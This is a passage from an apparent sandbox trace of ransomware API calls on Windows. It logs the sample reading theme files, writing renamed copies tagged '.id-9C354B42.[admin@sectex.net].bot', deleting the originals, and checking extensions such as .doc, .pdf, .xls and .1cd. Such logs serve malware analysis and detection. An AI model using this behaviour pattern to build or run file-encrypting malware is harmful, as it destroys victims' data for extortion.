	[0043.474] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x510, lpOverlapped=0x0) returned 1
	[0043.475] ReadFile (in: hFile=0x170, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.475] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.475] SetEndOfFile (hFile=0x190) returned 1
	[0043.475] CloseHandle (hObject=0x190) returned 1
	[0043.476] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.476] SetEndOfFile (hFile=0x170) returned 1
	[0043.477] CloseHandle (hObject=0x170) returned 1
	[0043.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.477] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 1
	[0043.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.477] lstrlenW (lpString=".doc") returned 4
	[0043.477] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.477] lstrlenW (lpString=".docx") returned 5
	[0043.477] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.477] lstrlenW (lpString=".pdf") returned 4
	[0043.478] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.478] lstrlenW (lpString=".xls") returned 4
	[0043.478] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.478] lstrlenW (lpString=".xlsx") returned 5
	[0043.478] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.478] lstrlenW (lpString=".ppt") returned 4
	[0043.478] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.478] lstrlenW (lpString=".zip") returned 4
	[0043.478] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.478] lstrlenW (lpString=".rar") returned 4
	[0043.478] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.478] lstrlenW (lpString=".bz2") returned 4
	[0043.478] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.478] lstrlenW (lpString=".7z") returned 3
	[0043.478] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.478] lstrlenW (lpString=".dbf") returned 4
	[0043.478] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.478] lstrlenW (lpString=".1cd") returned 4
	[0043.478] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.478] lstrlenW (lpString=".jpg") returned 4
	[0043.478] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.478] lstrlenW (lpString=".doc") returned 4
	[0043.478] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.478] lstrlenW (lpString=".docx") returned 5
	[0043.478] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.478] lstrlenW (lpString=".pdf") returned 4
	[0043.478] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.478] lstrlenW (lpString=".xls") returned 4
	[0043.478] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.479] lstrlenW (lpString=".xlsx") returned 5
	[0043.479] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.479] lstrlenW (lpString=".ppt") returned 4
	[0043.479] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.479] lstrlenW (lpString=".zip") returned 4
	[0043.479] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.479] lstrlenW (lpString=".rar") returned 4
	[0043.479] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.479] lstrlenW (lpString=".bz2") returned 4
	[0043.479] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.479] lstrlenW (lpString=".7z") returned 3
	[0043.479] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.479] lstrlenW (lpString=".dbf") returned 4
	[0043.479] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.479] lstrlenW (lpString=".1cd") returned 4
	[0043.479] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75
	[0043.479] lstrlenW (lpString=".jpg") returned 4
	[0043.479] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.479] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.479] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.479] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.480] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=20575) returned 1
	[0043.480] CloseHandle (hObject=0x170) returned 1
	[0043.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 0x20
	[0043.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.480] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.480] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0043.480] GetLastError () returned 0x0
	[0043.480] ReadFile (in: hFile=0x170, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x505f, lpOverlapped=0x0) returned 1
	[0043.820] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x5060, lpOverlapped=0x0) returned 1
	[0043.822] ReadFile (in: hFile=0x170, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.822] WriteFile (in: hFile=0x190, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.822] SetEndOfFile (hFile=0x190) returned 1
	[0043.822] CloseHandle (hObject=0x190) returned 1
	[0043.822] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.822] SetEndOfFile (hFile=0x170) returned 1
	[0043.823] CloseHandle (hObject=0x170) returned 1
	[0043.823] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.823] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 1
	[0043.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.823] lstrlenW (lpString=".doc") returned 4
	[0043.824] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.824] lstrlenW (lpString=".docx") returned 5
	[0043.824] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.824] lstrlenW (lpString=".pdf") returned 4
	[0043.824] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.824] lstrlenW (lpString=".xls") returned 4
	[0043.824] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.824] lstrlenW (lpString=".xlsx") returned 5
	[0043.824] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.824] lstrlenW (lpString=".ppt") returned 4
	[0043.824] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.824] lstrlenW (lpString=".zip") returned 4
	[0043.824] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.824] lstrlenW (lpString=".rar") returned 4
	[0043.824] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.824] lstrlenW (lpString=".bz2") returned 4
	[0043.824] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.824] lstrlenW (lpString=".7z") returned 3
	[0043.824] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.824] lstrlenW (lpString=".dbf") returned 4
	[0043.824] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.824] lstrlenW (lpString=".1cd") returned 4
	[0043.824] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.824] lstrlenW (lpString=".jpg") returned 4
	[0043.824] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.824] lstrlenW (lpString=".doc") returned 4
	[0043.824] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.824] lstrlenW (lpString=".docx") returned 5
	[0043.825] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.825] lstrlenW (lpString=".pdf") returned 4
	[0043.825] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.825] lstrlenW (lpString=".xls") returned 4
	[0043.825] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.825] lstrlenW (lpString=".xlsx") returned 5
	[0043.825] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.825] lstrlenW (lpString=".ppt") returned 4
	[0043.825] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.825] lstrlenW (lpString=".zip") returned 4
	[0043.825] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.825] lstrlenW (lpString=".rar") returned 4
	[0043.825] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.825] lstrlenW (lpString=".bz2") returned 4
	[0043.825] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.825] lstrlenW (lpString=".7z") returned 3
	[0043.825] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.825] lstrlenW (lpString=".dbf") returned 4
	[0043.825] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.825] lstrlenW (lpString=".1cd") returned 4
	[0043.825] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76
	[0043.825] lstrlenW (lpString=".jpg") returned 4
	[0043.825] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.825] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.825] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.826] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.412] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=26402) returned 1
	[0044.412] CloseHandle (hObject=0x200) returned 1
	[0044.428] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 0x20
	[0044.428] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.436] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.436] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0044.436] GetLastError () returned 0x0
	[0044.436] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x6722, lpOverlapped=0x0) returned 1
	[0044.438] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x6730, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x6730, lpOverlapped=0x0) returned 1
	[0044.439] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.439] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.439] SetEndOfFile (hFile=0x1f4) returned 1
	[0044.439] CloseHandle (hObject=0x1f4) returned 1
	[0044.440] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.440] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.441] CloseHandle (hObject=0x1a8) returned 1
	[0044.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.441] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 1
	[0044.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.441] lstrlenW (lpString=".doc") returned 4
	[0044.441] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.441] lstrlenW (lpString=".docx") returned 5
	[0044.441] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.441] lstrlenW (lpString=".pdf") returned 4
	[0044.441] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.441] lstrlenW (lpString=".xls") returned 4
	[0044.441] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.441] lstrlenW (lpString=".xlsx") returned 5
	[0044.441] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.441] lstrlenW (lpString=".ppt") returned 4
	[0044.441] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.441] lstrlenW (lpString=".zip") returned 4
	[0044.442] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.442] lstrlenW (lpString=".rar") returned 4
	[0044.442] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.442] lstrlenW (lpString=".bz2") returned 4
	[0044.442] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.442] lstrlenW (lpString=".7z") returned 3
	[0044.442] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.442] lstrlenW (lpString=".dbf") returned 4
	[0044.442] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.442] lstrlenW (lpString=".1cd") returned 4
	[0044.442] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.442] lstrlenW (lpString=".jpg") returned 4
	[0044.442] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.442] lstrlenW (lpString=".doc") returned 4
	[0044.442] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.442] lstrlenW (lpString=".docx") returned 5
	[0044.442] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.442] lstrlenW (lpString=".pdf") returned 4
	[0044.442] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.442] lstrlenW (lpString=".xls") returned 4
	[0044.442] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.442] lstrlenW (lpString=".xlsx") returned 5
	[0044.442] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.442] lstrlenW (lpString=".ppt") returned 4
	[0044.442] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.442] lstrlenW (lpString=".zip") returned 4
	[0044.442] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.443] lstrlenW (lpString=".rar") returned 4
	[0044.443] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.443] lstrlenW (lpString=".bz2") returned 4
	[0044.443] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.443] lstrlenW (lpString=".7z") returned 3
	[0044.443] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.443] lstrlenW (lpString=".dbf") returned 4
	[0044.443] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.443] lstrlenW (lpString=".1cd") returned 4
	[0044.443] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73
	[0044.443] lstrlenW (lpString=".jpg") returned 4
	[0044.443] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.443] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.443] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.443] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.443] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1379) returned 1
	[0044.444] CloseHandle (hObject=0x1a8) returned 1
	[0044.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 0x20
	[0044.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.444] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.444] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.444] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.444] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
